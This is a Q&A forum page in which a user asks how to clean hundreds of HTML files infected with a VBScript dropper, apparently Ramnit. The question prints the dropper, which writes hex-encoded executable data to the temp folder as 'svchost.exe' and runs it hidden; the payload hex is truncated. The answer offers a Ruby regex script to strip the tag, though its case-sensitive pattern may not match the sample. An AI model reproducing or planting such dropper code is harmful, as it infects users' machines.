Remove vbscript or deactivate vbscript from html source code

Question

I have few html files on my computer, that I borrowed from a friend, unfortunately all the files are infected, they all have malicious vbscript code inserted into the source. I have 100s of files and can't edit the source for all files. Is there a way I can remove the malicious script and still get the data?

Edit: Here is the sample of the code

<script language="VBScript"><!--
DropFileName = "svchost.exe"
WriteData = "4D5A9000030000000400........................8CB03FA48CB03"
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT>

Is it safe to upload it online?

some sort of global search+replace? But seriously, if they're infected with malicious code, your best advice is to trash them and restore from clean backups. (you *do* have backups, right?) — Spudley, Nov 07 '13 at 15:58
The virus is of the **[Win32.Ramnit.K](http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Virus:Win32/Ramnit.K#tab=2)** variant. — Extreme Coders, Aug 16 '14 at 04:03

score 1 · Answer 1 · answered Apr 07 '15 at 05:55

There are lot of antivirus software that'll detect this virus and remove the infected html files.

You can ran the following ruby script which will detect that bad vbscript tag and remove it.

class VirusKiller
  VIRUS_REG = /<SCRIPT Language=VBScript>[\s\w\W\d.]*<\/SCRIPT>/

  def fix_html_virus(file)
     return if File.extname(file) != '.html'
     file_content = File.read(file) 
     clean_content = file_content.gsub(VIRUS_REG, '')
     File.open(file, "w") { |new_file| new_file << clean_content }
  end

  def transverse_files(base)
    Dir.foreach(base) do |file|
      begin
        next if file == '.' or file == '..'

        if File.file?(base+file)
          fix_html_virus base+file
        else
          transverse_files(base+file+'/')
        end
      rescue Exception => e
        puts e.message
      end
    end
  end

  def run(root_path)
    transverse_files root_path
  end
end

VirusKiller.new.run ARGV[0]

Install Ruby, copy this script in some file( lets say virus_killer.rb ). Browse to location on this file in cmd( if you are in window ) and run this command.

ruby virus_killer.rb /path/to/infected_folder/

Remove vbscript or deactivate vbscript from html source code

1 Answers1

Linked